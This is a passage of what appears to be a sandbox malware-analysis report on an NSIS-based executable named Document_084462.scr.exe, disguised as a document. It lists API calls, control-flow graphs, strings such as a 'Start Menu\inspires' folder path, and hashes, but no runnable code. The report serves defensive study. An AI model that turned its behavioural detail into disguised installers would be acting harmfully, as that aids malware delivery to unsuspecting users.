                                                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403BD1
                                                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403BDC
                                                                              • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires), ref: 00403C25
                                                                              • RegisterClassW.USER32(007A7A00), ref: 00403C62
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7A
                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CAF
                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403CE5
                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,007A7A00), ref: 00403D11
                                                                              • GetClassInfoW.USER32(00000000,RichEdit,007A7A00), ref: 00403D1E
                                                                              • RegisterClassW.USER32(007A7A00), ref: 00403D27
                                                                              • DialogBoxParamW.USER32(?,00000000,00403E6B,00000000), ref: 00403D46
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                              • String ID: "C:\Users\user\Desktop\Document_084462.scr.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                              • API String ID: 606308-4187143652
                                                                              • Opcode ID: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                                                              • Instruction ID: 7ce8ec14a48fa11d69b3a5e1f0875b7083b8d607cd9ed6182ea3b60f82ca9994
                                                                              • Opcode Fuzzy Hash: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                                                              • Instruction Fuzzy Hash: 286193702407007ED320AB669D46F2B3A7CEB85B49F40853FF941B22E2DB7D99018B6D
                                                                              Function 00403015 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 368 403015-403063 GetTickCount GetModuleFileNameW call 405ee4 371 403065-40306a 368->371 372 40306f-40309d call 4063ee call 405d0f call 4063ee GetFileSize 368->372 373 403245-403249 371->373 380 4030a3 372->380 381 403188-403196 call 402fb1 372->381 383 4030a8-4030bf 380->383 387 403198-40319b 381->387 388 4031eb-4031f0 381->388 385 4030c1 383->385 386 4030c3-4030cc call 403444 383->386 385->386 394 4031f2-4031fa call 402fb1 386->394 395 4030d2-4030d9 386->395 390 40319d-4031b5 call 40345a call 403444 387->390 391 4031bf-4031e9 GlobalAlloc call 40345a call 40324c 387->391 388->373 390->388 414 4031b7-4031bd 390->414 391->388 419 4031fc-40320d 391->419 394->388 399 403155-403159 395->399 400 4030db-4030ef call 405e9f 395->400 404 403163-403169 399->404 405 40315b-403162 call 402fb1 399->405 400->404 417 4030f1-4030f8 400->417 410 403178-403180 404->410 411 40316b-403175 call 4068d0 404->411 405->404 410->383 418 403186 410->418 411->410 414->388 414->391 417->404 423 4030fa-403101 417->423 418->381 420 403215-40321a 419->420 421 40320f 419->421 424 40321b-403221 420->424 421->420 423->404 425 403103-40310a 423->425 424->424 426 403223-40323e SetFilePointer call 405e9f 424->426 425->404 427 40310c-403113 425->427 431 403243 426->431 427->404 428 403115-403135 427->428 428->388 430 40313b-40313f 428->430 432 403141-403145 430->432 433 403147-40314f 430->433 431->373 432->418 432->433 433->404 434 403151-403153 433->434 434->404
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00403026
                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Document_084462.scr.exe,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                                                                • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\Document_084462.scr.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                                                                • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                                                              • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Document_084462.scr.exe,C:\Users\user\Desktop\Document_084462.scr.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                                                              • GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                              • String ID: "C:\Users\user\Desktop\Document_084462.scr.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Document_084462.scr.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                              • API String ID: 2803837635-582730717
                                                                              • Opcode ID: 08ca265c2c11c7ade98783a519f9a0a5c073a42a03571b96a4881a179354b053
                                                                              • Instruction ID: b65d07b499067b34cf8ea267e223a71d0fae98adc47698ec1498b1efb03bef53
                                                                              • Opcode Fuzzy Hash: 08ca265c2c11c7ade98783a519f9a0a5c073a42a03571b96a4881a179354b053
                                                                              • Instruction Fuzzy Hash: DD51D171900204ABDB119F64DD85B9E7EACEB45316F20843BE911BA2D1DB7C8F418B5D
                                                                              Function 0040642B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 499 40642b-406436 500 406438-406447 499->500 501 406449-40645f 499->501 500->501 502 406465-406472 501->502 503 406677-40667d 501->503 502->503 504 406478-40647f 502->504 505 406683-40668e 503->505 506 406484-406491 503->506 504->503 508 406690-406694 call 4063ee 505->508 509 406699-40669a 505->509 506->505 507 406497-4064a3 506->507 511 406664 507->511 512 4064a9-4064e7 507->512 508->509 515 406672-406675 511->515 516 406666-406670 511->516 513 406607-40660b 512->513 514 4064ed-4064f8 512->514 519 40660d-406613 513->519 520 40663e-406642 513->520 517 406511 514->517 518 4064fa-4064ff 514->518 515->503 516->503 521 406518-40651f 517->521 518->517 524 406501-406504 518->524 525 406623-40662f call 4063ee 519->525 526 406615-406621 call 406335 519->526 522 406651-406662 lstrlenW 520->522 523 406644-40664c call 40642b 520->523 528 406521-406523 521->528 529 406524-406526 521->529 522->503 523->522 524->517 532 406506-406509 524->532 536 406634-40663a 525->536 526->536 528->529 534 406561-406564 529->534 535 406528-40654f call 4062bc 529->535 532->517 537 40650b-40650f 532->537 540 406574-406577 534->540 541 406566-406572 GetSystemDirectoryW 534->541 547 406555-40655c call 40642b 535->547 548 4065ef-4065f2 535->548 536->522 539 40663c 536->539 537->521 543 4065ff-406605 call 40669d 539->543 545 4065e2-4065e4 540->545 546 406579-406587 GetWindowsDirectoryW 540->546 544 4065e6-4065ea 541->544 543->522 544->543 550 4065ec 544->550 545->544 549 406589-406593 545->549 546->545 547->544 548->543 553 4065f4-4065fa lstrcatW 548->553 555 406595-406598 549->555 556 4065ad-4065c3 SHGetSpecialFolderLocation 549->556 550->548 553->543 555->556 560 40659a-4065a1 555->560 557 4065c5-4065dc SHGetPathFromIDListW CoTaskMemFree 556->557 558 4065de 556->558 557->544 557->558 558->545 561 4065a9-4065ab 560->561 561->544 561->556
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040656C
                                                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 0040657F
                                                                              • SHGetSpecialFolderLocation.SHELL32(0040548D,0079A700,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 004065BB
                                                                              • SHGetPathFromIDListW.SHELL32(0079A700,Call), ref: 004065C9
                                                                              • CoTaskMemFree.OLE32(0079A700), ref: 004065D4
                                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065FA
                                                                              • lstrlenW.KERNEL32(Call,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 00406652
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                              • API String ID: 717251189-1230650788
                                                                              • Opcode ID: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                                                              • Instruction ID: 6a9894c1754425a34e634a53c322024ca71031740d406166b65bc8419ebad360
                                                                              • Opcode Fuzzy Hash: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                                                              • Instruction Fuzzy Hash: A261F471600505ABDF249F24DD40ABE37A5AF51318F22813FE543BA2D4DB3D8AA1CB5E
                                                                              Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 562 40176f-401794 call 402d3e call 405d3a 567 401796-40179c call 4063ee 562->567 568 40179e-4017b0 call 4063ee call 405cc3 lstrcatW 562->568 573 4017b5-4017b6 call 40669d 567->573 568->573 577 4017bb-4017bf 573->577 578 4017c1-4017cb call 40674c 577->578 579 4017f2-4017f5 577->579 587 4017dd-4017ef 578->587 588 4017cd-4017db CompareFileTime 578->588 580 4017f7-4017f8 call 405ebf 579->580 581 4017fd-401819 call 405ee4 579->581 580->581 589 40181b-40181e 581->589 590 40188d-4018b6 call 405456 call 40324c 581->590 587->579 588->587 591 401820-40185e call 4063ee * 2 call 40642b call 4063ee call 405a54 589->591 592 40186f-401879 call 405456 589->592 604 4018b8-4018bc 590->604 605 4018be-4018ca SetFileTime 590->605 591->577 624 401864-401865 591->624 602 401882-401888 592->602 607 402bcb 602->607 604->605 606 4018d0-4018db CloseHandle 604->606 605->606 609 4018e1-4018e4 606->609 610 402bc2-402bc5 606->610 612 402bcd-402bd1 607->612 613 4018e6-4018f7 call 40642b lstrcatW 609->613 614 4018f9-4018fc call 40642b 609->614 610->607 620 401901-402390 613->620 614->620 625 402395-40239a 620->625 626 402390 call 405a54 620->626 624->602 627 401867-401868 624->627 625->612 626->625 627->592
                                                                              APIs
                                                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,?,00000031), ref: 004017B0
                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,?,00000031), ref: 004017D5
                                                                                • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                                                                • Part of subcall function 00405456: lstrlenW.KERNEL32(007A0F28,00000000,0079A700,770423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                                                                • Part of subcall function 00405456: lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,770423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                                                                • Part of subcall function 00405456: lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,770423A0), ref: 004054B1
                                                                                • Part of subcall function 00405456: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                                                                • Part of subcall function 00405456: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                                                                • Part of subcall function 00405456: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                                                                • Part of subcall function 00405456: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp$C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call
                                                                              • API String ID: 1941528284-954349847
                                                                              • Opcode ID: d08f73f743aae90bf59320a470bb384619887ead500b3c6bbfc993fd6adf6129
                                                                              • Instruction ID: cd03b910d30ecf031e582351f340fed2e2266b195dd1fdcb6122cfe31266ec79
                                                                              • Opcode Fuzzy Hash: d08f73f743aae90bf59320a470bb384619887ead500b3c6bbfc993fd6adf6129
                                                                              • Instruction Fuzzy Hash: 0B418571510508BACF11BFB5CD85DAE3A79EF45329B20423FF422B11E1DB3C8A519A6E
                                                                              Function 00405925 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 642 405925-405970 CreateDirectoryW 643 405972-405974 642->643 644 405976-405983 GetLastError 642->644 645 40599d-40599f 643->645 644->645 646 405985-405999 SetFileSecurityW 644->646 646->643 647 40599b GetLastError 646->647 647->645
                                                                              APIs
                                                                              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405968
                                                                              • GetLastError.KERNEL32 ref: 0040597C
                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405991
                                                                              • GetLastError.KERNEL32 ref: 0040599B
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040594B
                                                                              • C:\Users\user\Desktop, xrefs: 00405925
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                              • API String ID: 3449924974-26219170
                                                                              • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                              • Instruction ID: 4c6d3c4ce34384c56ae6b54862a6db5cebbf8231f9905efb0a53c4272bf1951e
                                                                              • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                              • Instruction Fuzzy Hash: E1011AB1C00219EADF009FA5DD44BEFBBB8EF04314F00803AD544B6190E7789648CFA9
                                                                              Function 00406773 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 648 406773-406793 GetSystemDirectoryW 649 406795 648->649 650 406797-406799 648->650 649->650 651 4067aa-4067ac 650->651 652 40679b-4067a4 650->652 654 4067ad-4067e0 wsprintfW LoadLibraryExW 651->654 652->651 653 4067a6-4067a8 652->653 653->654
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                                                              • wsprintfW.USER32 ref: 004067C5
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                              • API String ID: 2200240437-1946221925
                                                                              • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                              • Instruction ID: 038d7fed81a94acb9f8d17f6b302bf2205b26bc145b48260013954e6d266918a
                                                                              • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                              • Instruction Fuzzy Hash: 65F0F670510119A7CF14AB64DD0DF9B376CAB40309F10047AA646F20D0EB7C9A68CBA8
                                                                              Function 0040324C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
